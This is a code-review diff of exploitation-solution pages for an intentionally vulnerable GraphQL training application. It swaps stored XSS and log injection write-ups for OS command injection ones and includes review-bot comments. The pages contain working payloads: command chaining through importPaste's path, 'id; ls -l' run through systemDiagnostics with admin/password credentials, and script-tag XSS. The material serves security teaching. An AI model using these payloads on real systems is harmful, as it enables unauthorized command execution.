Showing 27 changed files with 519 additions and 400 deletions.
@@ -1,32 +1,38 @@ | ||
<!-- Start --> | ||
<h3 style="color:purple" id="inj-xss"><b>Injection :: Stored Cross Site Scripting</b></h3> | ||
<h3 style="color:purple" id="exec-os-1"><b>Code Execution :: OS Command Injection #1</b></h3> | ||
<hr /> | ||
<h5>Problem Statement</h5> | ||
<p> | ||
The GraphQL mutations <code>createPaste</code> and <code>importPaste</code> allow creating and importing new pastes. The pastes may include any character without any restrictions. The pastes would then render in | ||
the Public and Private paste pages, which would result in a Cross Site Scripting vulnerability (XSS).</p> | ||
The mutation <code>importPaste</code> allows escaping from the parameters and introduce a UNIX command by chaining | ||
commands. The GraphQL resolver does not sufficiently validate the input, and passes it directly | ||
into <code>cURL</code>.</p> | ||
<h5>Resources</h5> | ||
<ul> | ||
<li> | ||
<a href="https://portswigger.net/web-security/cross-site-scripting/stored" target="_blank"> | ||
<i class="fa fa-newspaper"></i> PortSwigger - Stored Cross Site Scripting | ||
<a href="https://owasp.org/www-community/attacks/Command_Injection" target="_blank"> | ||
<i class="fa fa-newspaper"></i> OWASP - Command Injection | ||
</a> | ||
</li> | ||
</ul> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-inj-xss')">Show</button></h5> | ||
<div id="sol-inj-xss" style="display:none"> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-exec-os-1')">Show</button></h5> | ||
<div id="sol-exec-os-1" style="display:none"> | ||
<pre class="bash"> | ||
# Create New Paste allows special characters that would render in HTML. | ||
mutation { | ||
createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) { | ||
pasteId | ||
} | ||
} | ||
# Beginner mode | ||
|
||
# Alternatively, importing a paste that includes Javascript will also result in the same behaviour. | ||
mutation { | ||
importPaste(host:"localhost", port:80, path:"/xss.html"") | ||
} | ||
</pre> | ||
# Import Paste allows specifying UNIX characters to break out of the URL provided to importPaste, using characters such as ";" "&&", "||", and more. | ||
mutation { | ||
importPaste(host:'localhost', port:80, path:"/ ; uname -a", scheme:"http"){ | ||
result | ||
} | ||
} | ||
|
||
# Expert mode | ||
|
||
# Import Paste filters characters such as ";" and "&" but not "|", if you manage to cause the import to fail, you can double pipe it to a command that will execute in the context of the operating system. | ||
mutation { | ||
importPaste(host:"hostthatdoesnotexist.com", port:80, path:"/ || uname -a", scheme:"http") { | ||
result | ||
} | ||
}</pre> | ||
</div> | ||
<!-- End --> |
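Review bot: the beginner-mode example in this hunk passes the host as a single-quoted string (`importPaste(host:'localhost', port:80, path:"/ ; uname -a", scheme:"http")`), which GraphQL's string-literal grammar does not accept, so a reader who copies it gets a document parse error instead of the `uname -a` output; use `host:"localhost"` as the expert-mode example below it does. The problem statement's sentence "allows escaping from the parameters and introduce a UNIX command by chaining commands" should read "allows escaping from the parameters and introducing a UNIX command by chaining commands", and since only `path` carries the payload in both examples, naming `path` as the injection point in that paragraph would save the reader from guessing whether `host` or `scheme` are also affected.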
@@ -1,36 +1,47 @@ | ||
<!-- Start --> | ||
<h3 style="color:purple" id="inj-log"><b>Injection :: Log Injection</b></h3> | ||
<h3 style="color:purple" id="exec-os-2"><b>Code Execution :: OS Command Injection #2</b></h3> | ||
<hr /> | ||
<h5>Problem Statement</h5> | ||
<p> | ||
GraphQL actions such as <code>mutation</code> and <code>query</code> have the ability to take an <code>operation name</code> as part of the query. | ||
Here is an example query that uses <code>MyName</code> as an operation name: | ||
<pre>query MyName { | ||
getMyName | ||
{ | ||
first | ||
last | ||
} | ||
} </pre></p> | ||
<p>The application is keeping track of all queries and mutations users are executing on this system in order to display them in the audit log.</p> | ||
<p>However, the application is not doing a fair job at verifying the operation name.</p> | ||
The query <code>systemDiagnostics</code> accepts certain UNIX binaries as parameters for debugging purposes, such as | ||
<code>whoami</code>, <code>ps</code>, etc. It acts as a restricted shell. However, it is protected | ||
with a username and password. After obtaining the <a href="http://127.0.0.1:5000/solutions#misc-weakpass">correct | ||
credentials</a>, the restricted shell seems to be bypassable by chaining commands together. | ||
</p> | ||
<h5>Resources</h5> | ||
<ul> | ||
<li> | ||
<a href="https://cwe.mitre.org/data/definitions/117.html" target= "_blank"> | ||
<i class="fa fa-newspaper"></i> CWE-117: Improper Output Neutralization for Logs | ||
<a href="https://www.netsparker.com/blog/web-security/command-injection-vulnerability/" target="_blank"> | ||
<i class="fa fa-newspaper"></i> Netsparker - Command Injection | ||
</a> | ||
</li> | ||
</ul> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-inj-log')">Show</button></h5> | ||
<div id="sol-inj-log" style="display:none"> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-exec-os-2')">Show</button></h5> | ||
<div id="sol-exec-os-2" style="display:none"> | ||
<pre class="bash"> | ||
# Spoof the operation conducted to getPaste instead of createPaste | ||
mutation getPaste{ | ||
createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) { | ||
pasteId | ||
} | ||
} | ||
</pre> | ||
# System Diagnostics suffers from weak restricted shell implementation | ||
|
||
query { | ||
systemDiagnostics(username:"admin", password:"password", cmd:"id") | ||
} | ||
|
||
>>> Response: | ||
{ | ||
"data": { | ||
"systemDiagnostics": "id: command not found" | ||
} | ||
} | ||
|
||
|
||
query { | ||
systemDiagnostics(username:"admin", password:"password", cmd:"id; ls -l") | ||
} | ||
|
||
>>> Response: | ||
{ | ||
"data": { | ||
"systemDiagnostics": "total 128\ndrwxr-xr- .. COLORTERM=truecolor\n_=/usr/bin/env\n" | ||
} | ||
}</pre> | ||
</div> | ||
<!-- End --> |
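Review bot: the cross-reference to the credentials is hard-coded as `http://127.0.0.1:5000/solutions#misc-weakpass`, so it breaks as soon as the application is served on any other host or port; the `misc-weakpass` anchor lives on the same solutions page, so a relative `#misc-weakpass` (or `/solutions#misc-weakpass`) is enough. The transcript would also demonstrate the bypass more clearly if it chained from one of the allowlisted binaries the problem statement names (`whoami`, `ps`): as written, the first request shows `id` failing with "command not found" and the second shows `id; ls -l` returning a listing, but nothing tells the reader whether `ls` is itself permitted or whether only the text before `;` is checked, which is the point being made. The captured `ls -l` output (`total 128\ndrwxr-xr- ..`) also runs straight into environment variables (`COLORTERM=truecolor`, `_=/usr/bin/env`), so it looks trimmed in the middle; either show the listing intact or mark the cut explicitly.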